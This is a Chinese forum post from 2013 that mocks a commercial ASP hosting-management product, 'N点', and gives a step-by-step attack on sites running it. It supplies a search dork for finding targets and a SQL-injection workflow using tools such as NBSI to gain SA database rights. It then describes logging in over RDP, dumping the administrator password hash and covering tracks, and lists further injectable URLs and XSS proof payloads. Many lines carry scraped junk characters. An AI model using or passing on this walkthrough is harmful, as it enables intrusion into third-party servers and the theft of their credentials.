不得不说N点实在是一个破东西
7 H$ a1 e! \2 u$ [$ {* T7 m就算他开发的商业版,就算商业版附带了安全设置也不能掩饰他的破烂0 v7 u# U1 G) J# S
好吧 抱怨一下就行了 接下来关键的时候到了
# W. @! g# {& m# Y: Q8 e首先百度搜索关键字:inurl: (mmdatabase.asp)9 _2 Y' D! H/ W7 r; a7 \
我随便列举一个: www.xxxx.com
- ]6 L" W% U, ^8 N& o* ]- @修改链接:http://www.xxxx.com:80/Style/new ... &RID=1&ID=1
6 I7 c$ ^" M8 p' h/ T8 d扔入NBSI 或者啊D等各种傻逼工具后* A! f9 k! C( {1 ^6 R; W% W5 a
你们会看到是SA权限. Y9 J+ S; X! j: a" w
果断3389 上去 hash得到administrator密码
1 \' a; [! o$ m. R擦屁股走人~
* J Q1 U8 C, c) z, n/ J6 M经过基友本人测试10个这个程序5个以上有这个漏洞5个里面有一半是SA权限的
: E3 C6 o# Q m; w2 _" {* U
$ R" p5 L9 s) o+ N- u$ Y/ ?再附上其他几个漏洞页面
* {; T$ ?7 q) H ^$ aSQL:
7 V/ X2 M' B- q6 z/ ahttp://www.xxxxxx.com:80/Style/flashad/flashad.asp?adid=1* P/ H) ~" m( \
http://www.xxxxxx.com:80/Manage/ ... ogin.asp&PID=11
: }/ k7 S; j$ L0 H. M) Dhttp://www.xxxxxx.com:80/Manage/ ... login.asp&PID=9
6 u- X' q* g$ o3 W3 Dhttp://www.xxxxxx.com:80/Style/vhosting.asp?classID=2; Q8 F% L3 r. y" a9 L
XSS证明: w- I+ x t* _
http://www.xxxxxx.com:80/Manage/ ... yle/memberlogin.asp”;alert(42873);”
, i1 b2 W! u. q; m5 Chttp://www.xxxxxx.com:80/Manage/ ... yle/memberlogin.asp”;alert(42873);”& @* s d; e. {# h
http://www.xxxxxx.com:80/Style/d ... mp;checkbox2=.bj.cn<script>alert(42873)</script>8 ]6 s& @4 L$ e& L1 E
由此可见点就是坑逼中的战斗机 自从用了他我的眼泪都流干了 有做IDC的朋友千万别步我后尘啊 便宜没好货好货不便宜2 ~9 p4 _ `- [7 A/ i; X- z, l0 x# a4 c
还是星外吧 你们懂的2 w+ Z) B$ Q B- f0 O) u
作为一个商用程序 安全如此堪忧甚至于连网上开源的一些程序都有所不如,这样的公司能走多远?
. V5 D, ^' D% e9 h/ s ^0 T' ^3 BPS:其实我真的很想知道你说N点这SB asp就asp吧 为什么asp还非要MSSQL 这不是好像告诉我们快来日吧我们很容易日的,裤子都脱啦,就等你啦。 o(︶︿︶)o 唉
8 K) t! a2 k0 ` R- C! v8 B——- |
发表于 2013-3-3 08:06:44
收藏
支持
反对